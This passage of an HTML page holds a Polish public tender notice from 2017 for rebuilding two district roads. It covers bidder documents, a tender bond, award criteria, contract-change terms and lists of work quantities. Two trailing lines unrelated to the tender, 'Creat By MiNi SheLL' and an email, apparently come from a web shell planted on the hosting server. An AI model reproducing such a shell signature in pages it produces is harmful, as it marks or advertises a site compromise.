	gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania 	wykonawcy lub miejsce  zamieszkania  tej  osoby.  Podany  powyżej  przepis  	dotyczący  terminu  wystawienia dokumentów stosuje się odpowiednio. 
	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, 	zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce 	zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych 	informacji dotyczących tego dokumentu. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz  oświadczeń  lub  dokumentów  składanych  przez  wykonawcę  w 
	postępowaniu w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 
	1 pkt 1 ustawy  Prawo zamówień publicznych w zakresie spełniania warunków 
	udziału w postępowaniu: 
 
9.4.1.  Wykonawca,  którego  oferta  została  najwyżej  oceniona,    zobowiązany  jest  złożyć 
	Zamawiającemu,  na  jego  wezwanie,  w  wyznaczonym,  nie  krótszym  niż  5  dni, 
	terminie,  następujące  oświadczenia  i  dokumenty,  w  celu  potwierdzenia 
	okoliczności, o których mowa w art. 25 ust. 1 pkt 1 ustawy  Prawo zamówień 
	publicznych w zakresie spełniania warunków udziału w postępowaniu: 
1)  Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed 
	upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 	w tym  okresie,  wraz  z  podaniem  ich  rodzaju,  wartości,  daty,  miejsca  wykonania  	i podmiotów,  na  rzecz  których  roboty  te  zostały  wykonane,  z  załączeniem  	dowodów określających  czy  te  roboty  budowlane  zostały  wykonane  należycie,  w  	szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami 	prawa budowlanego i prawidłowo  ukończone,  przy  czym  dowodami,  o  których  	mowa,  są  referencje  bądź  inne dokumenty  wystawione  przez  podmiot,  na  rzecz  	którego  roboty  budowlane  były wykonywane,  a  jeżeli  z  uzasadnionej  przyczyny             
          o  obiektywnym  charakterze  wykonawca nie jest w stanie uzyskać tych dokumentów 	- inne dokumenty, z wykorzystaniem wzoru stanowiącego  Załącznik  nr  7  do              
          Specyfikacji,  przy  czym  Zamawiający  określa następujące  roboty  budowlane  w               
          zakresie  niezbędnym  do  wykazania  posiadania  przez Wykonawcę stosownego    
          doświadczenia: co najmniej 3 roboty budowlane o 	charakterze i złożoności    
          porównywalnej z zakresem zadania będącego przedmiotem zamówienia, tj, co     
          najmniej 3 roboty budowlane w zakresie budowy lub przebudowy drogi o nawierzchni z    
          betonu asfaltowego o długości przynajmniej 1,0 km.  
2)  Wykaz  narzędzi,  wyposażenia  zakładu  lub  urządzenia  techniczne  dostępnymi 
	Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o 	podstawie do dysponowania tymi zasobami, z wykorzystaniem wzoru stanowiącego 	Załącznik nr 8 do  Specyfikacji,  przy  czym  Zamawiający  określa  następujące  	narzędzia,  wyposażenie zakładu  lub  urządzenia  techniczne  w  zakresie  	niezbędnym  do  wykazania  posiadania przez Wykonawcę stosownego potencjału 	technicznego:  
a)  koparka, w tym do wykonywania  wykopów głębokich 
b)  ładowarka  
c)  równiarka lub spycharka uniwersalna 
d)  walec stalowy wibracyjny lub statyczny 
e)  walec ogumiony 
f)   skrapiarka lepiszcza  
g)  równiarka albo układarka do rozkładania mieszanki tłuczniowej, 
h)  wytwórnia  (otaczarka)  o  mieszaniu  cyklicznym  lub  ciągłym,  z  automatycznym 
     komputerowym  sterowaniem  produkcji,  do  wytwarzania  mieszanek  mineralno-
     asfaltowych,  
i)  układarka gąsienicowa z elektronicznym sterowaniem równości układanej warstwy,  
j)  samochód samowyładowczy z przykryciem brezentowym lub termosami. 
3)  Wykaz  osób  skierowanych  przez  Wykonawcę  do  realizacji  zamówienia,  w  	szczególności odpowiedzialnych  za  kierowanie  robotami  budowlanymi,  wraz  z  	informacjami  na  temat ich  kwalifikacji  zawodowych,  uprawnień,  a  także  zakresu  	wykonywanych  przez  nie czynności  oraz  informacją  o  podstawie  do  	dysponowania tymi osobami, z wykorzystaniem wzoru stanowiącego Załącznik nr 9       
           do  Specyfikacji,  przy  czym Zamawiający określa następujące osoby w zakresie 	niezbędnym do wykazania posiadania przez Wykonawcę stosownych zdolności 	zawodowych:  co najmniej 1 osoba posiadająca uprawnienia  budowlane  do  	kierowania  robotami  budowlanymi  w  specjalności  drogowej lub inne uprawnienia 	umożliwiające wykonywanie tych samych czynności do wykonania, których  w  	aktualnym  stanie  prawnym  uprawniają  uprawnienia  budowlane  w  tej 
	specjalności.  
 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca  zobowiązany  jest  złożyć  następujące  inne  dokumenty  w  ramach 
	oferty: 
1)  Wypełniony  i  podpisany  Formularz  ofertowy  z  wykorzystaniem  wzoru  stanowiącego 
	Załącznik nr 1 i Załącznik nr 1a do Specyfikacji. 
2)  Kosztorys ofertowy wypełniony w poszczególnych pozycjach, w tym z podaniem stawek 
     jednostkowych, z wykorzystaniem wzoru stanowiącego Załącznik nr 2 i 2a do     
     Specyfikacji 
3) Zaakceptowany Wzór umowy stanowiący Załącznik nr 3 do Specyfikacji.
4)  Informacja dot. podwykonawców, w tym zawierająca wskazanie części zamówienia, 
	której  wykonanie  Wykonawca  zamierza  powierzyć  podwykonawcy,  z  	wykorzystaniem wzoru  stanowiącego  Załącznik  nr  10  do  Specyfikacji    jeżeli  	Wykonawca  zamierza powierzyć wykonanie części zamówienia podwykonawcom, 
5)  Pełnomocnictwo  w  przypadku  Wykonawców  wspólnie  ubiegających  się  o  udzielenie 
	zamówienia  oraz  do  reprezentowania  Wykonawcy  przez  Pełnomocnika    jeżeli  	został ustanowiony  (oryginał  lub  kopia  poświadczona  za  zgodność  z  oryginałem  	przez notariusza) .  
6)  Potwierdzenie wniesienia wadium w formie, terminie i kwocie określonej w SIWZ
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />.  Zamawiający  żąda  wniesienia  wadium  w  kwocie  : 
         a) Zadanie I : 58 500,00 zł  (słownie zł: pięćdziesiąt osiem tysięcy pięćset złotych    
                                 00/100). 
         b) Zadanie II : 72 000,00 zł (słownie zł: (siedemdziesiąt dwa tysiące złotych 
10.2.  Wadium wnosi się na okres związania ofertą. 
10.3.  Wadium należy wnieść przed upływem terminu składania ofert. 
10.4.  Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)  pieniądzu; 
2)  poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo-
	kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3)  gwarancjach bankowych; 
4)  gwarancjach ubezpieczeniowych; 
5)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
	ustawy  z  dnia  9  listopada  2000  r.  o  utworzeniu  Polskiej  Agencji  Rozwoju 
	Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.). 
10.5.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek      
          bankowy zamawiającego:
                               PKO BP S.A.   09 1020 1462 0000 7102 0307 4457
10.6.  Wadium  wnoszone  w  pieniądzu  musi  być  wniesione,  czyli  musi  być  na     
          rachunku bankowym Zamawiającego, przed upływem terminu składania ofert. 
10.7.  Oryginał  dowodu  dokonania  przelewu  lub  kopię  dowodu  dokonania  przelewu 
	poświadczoną za zgodność z oryginałem przez Wykonawcę należy dołączyć do    
           oferty. 
10.8.  Niedopuszczalne jest wpłacanie wadium w kasie Zamawiającego. 
10.9.  Wadium  wnoszone  w  formie  poręczenia  bankowego,  gwarancji  bankowej, 
	gwarancjach  ubezpieczeniowych  lub  poręczenia  udzielonego  przez  Polska  	Agencję Rozwoju  Przedsiębiorczości  należy  dołączyć  do  ofert  w  formie  	oryginału,  przy  czym oryginał  można  złożyć  rozdzielnie,  ale  w  tym  samym  	opakowaniu  co  oferta,  a potwierdzoną za zgodność z oryginałem kopię wpiąć do	oferty. 
  
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  tak
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza, przy jednoczesnym zachowaniu wymagań określonych w 	art. 144 ustawy    Prawo  zamówień  publicznych,  możliwość  dokonania  	następujących  zmian postanowień zawartej umowy,: 
       1)  zmiany  zakresu  części  zamówienia,  które  zlecane  będą  podwykonawcom  oraz  	zmiany podwykonawcy  pod  warunkiem  spełnienia  postanowień  Specyfikacji  	Istotnych Warunków Zamówienia dotyczących podwykonawców, 
      2)  zmiany  podmiotu  udostępniającego  wiedzę  i  doświadczenie, potencjał  techniczny,  	osób zdolnych  do  wykonania  zamówienia  lub  zmiany  zdolności  finansowej  	wykazane  w ofercie  pod  warunkiem  spełnienia  postanowień  Specyfikacji  	Istotnych  Warunków Zamówienia dotyczących podmiotów udostępniających wiedzę i 	doświadczenie, potencjał techniczny, osób zdolnych do wykonania zamówienia lub 	zdolności finansowe, 
     3)  wynikającym  ze  zmian  przepisów  prawa  w  zakresie  mającym wpływ na  realizację 
	przedmiotu zamówienia, 
     4)  terminu realizacji zamówienia z uwagi na: 
 a)  działanie siły wyższej, 
b)  konieczność  takiej  zmiany  wynikać  będzie  z  okoliczność,  których  nie  można  było 
	przewidzieć w chwili zawarcia umowy mimo zachowania należytej staranności, 
c)  przeszkody, utrudnienia spowodowane przez osoby trzecie, 
d)  opóźnienia, utrudnienia lub przeszkody spowodowane przez Zamawiającego, 
5)  zmiany wysokości wynagrodzenia wynikającą z: 
a)  konieczności ograniczenia zakresu robót, 
b)  konieczności  wykonania  robót  dodatkowych  niezbędnych  do  prawidłowego 
	wykonania zamówienia, których wykonanie stało się konieczne na skutek sytuacji 
	niemożliwej wcześniej do przewidzenia, 
c)  zmiany stawki podatku od towarów i usług, 
6)  zmiany  osób  uczestniczących  w  realizacji  zamówienie  z  następujących  powodów,  	przy czym  zmiana  jest  możliwa  jedynie  na  nowe  osoby  spełniające  wymogi  	postanowień Specyfikacji Istotnych Warunków Zamówienia: 
a)  z uwagi na śmierć, chorobę lub innych zdarzeń losowych tych osób, 
b)  z  uwagi  na  niewywiązywanie  się  tych  osób  z  obowiązków  wynikających  z 
	powierzonych im zadań, 
c)  jeżeli  zmiana  tych  osoby  stanie  się  konieczna  z  jakichkolwiek  innych  przyczyn 
	niezależnych od Zamawiającego lub Wykonawcy (np. rezygnacji). 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 01/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Zadanie nr I Przebudowa drogi powiatowej nr 2225C Stary Kobrzyniec - Czumsk Duży -                      gr. woj. (Szczutowo) na odcinku Rogowo - Sosnowo ETAP 2 od km 3+712,76      do km 8+392,00<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	Długość przebudowywanego odcinka drogi - 4,679 km;
	klasa techn. Z ;
	prędkość projektowa - 50 km/h; 
	kategoria ruchu - KR1; 
	szer. jezdni 5,5m; szer. pobocza 2x1,0m (w tym pobocze wzmocnione o szer. 0,5m
	wykonanie w-wy wyrównawczej z betonu asf. gr.4cm - m2 22050;
	wykonanie w-wy ścieralnej z betonu asf. gr. 4cm - m2 26410; 
	ułożenie geosiatki na poszerzeniu jezdni - m2 8890;
	przebudowa istn. skrzyżowania  trójwlotowego - szt 1;
	budowa chodników - 178 mb;
	przebudowa chodników - 297 mb; 
	odtworzenie rowów odwadniających - m 8400;
	budowa i przebudowa zjazdów wraz z przepustami - m 116;
	budowa peronów przystankowych - szt.4; 
	wykonanie w m. Sosnowo oświetlenia drog. hybrydowego na przejściu dla pieszych - szt.1 
	wykonanie oznakowania aktywnego przejść dla pieszych - kpl.1 (przy PKS);
	 montaż oznakowania pionowego - 51szt; 
	wykonanie oznakowania poziomego (linie na skrzyżowaniach i przejściach dla pieszych) - m2 48.
	wycinka drzew wraz z usunięciem i wywozem karpiny  szt. 72; 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233100-0, 45233300-2,
                    45233252-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Zadanie nr II Przebudowa drogi powiatowej nr 2118C SzafarniaWąpielskDługieRypin od km 6+098 do km 11+550<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>-   długość przebudowywanego odcinka drogi - 4952 mb,
      -   klasa techniczna drogi  Z ; 
      -   prędkość projektowa  40 km/h; 
      -   szerokość drogi - 5,5 metra; 
      -   szerokość pasów ruchu  2,75 metra; 
-   szerokość chodników  2,0 metry;
-   szerokość pobocza- 2,0 metry;
-   szerokość zjazdów drogowych  4,0 metry;
-   kategoria ruchu  KR2 ; 
-   nośność drogi  100kN/oś
      -  długość wybudowanych chodników  4050 mb ;
      -  pobocze : wzmocnione obustronnie na szer. 0,5 m - 2770 m2 ;
      -  frezowanie nawierzchni jezdni w miejscach skoleinowanych  22420 m˛ ; 
      -  wykonanie bitumicznej warstwy wyrównawczej z betonu asfaltowego AC 11W śr. gr. 4     
         cm  22420 m2 ; 
      -  wykonanie warstwy ścieralnej z betonu asfaltowego AC 8 S gr. 4 cm całym odcinku     
         drogi (4,952 km)   27865 m˛ ;  
      -  wzmocnienie nawierzchni geosiatką na styku starej i nowej nawierzchni o szer. 2,0 m        
         m2 9980 .
      -  montaż oznakowania pionowego   szt. 37 ; 
      -  montaż znaku aktywnego - przejście dla pieszych  kpl 2 ; 
      -  oświetlenie przy przejściach dla pieszych zasilanych energią słoneczną i wiatrową
         kpl. 5 ; 
      -  bariery ochronne skrajne: 134 mb; 
      -  poręcze ochronne zabezpieczające ruch pieszy: 40 mb ; 
      -  wykonanie oznakowania poziomego : linie na trasie, skrzyżowaniach i przejściach dla     
         pieszych -363 m2 ; 
      -  wycinka drzew wraz z usunięciem i wywozem karpiny  szt. 270; 
      -  urządzenia wyposażenia technicznego drogi: odwodnienie  ściek podchodnikowy z      
         prefabrykowanych elementów betonowych (korytkowy)  mb 195;  
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233100-0, 45233300-2,
                    45233252-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com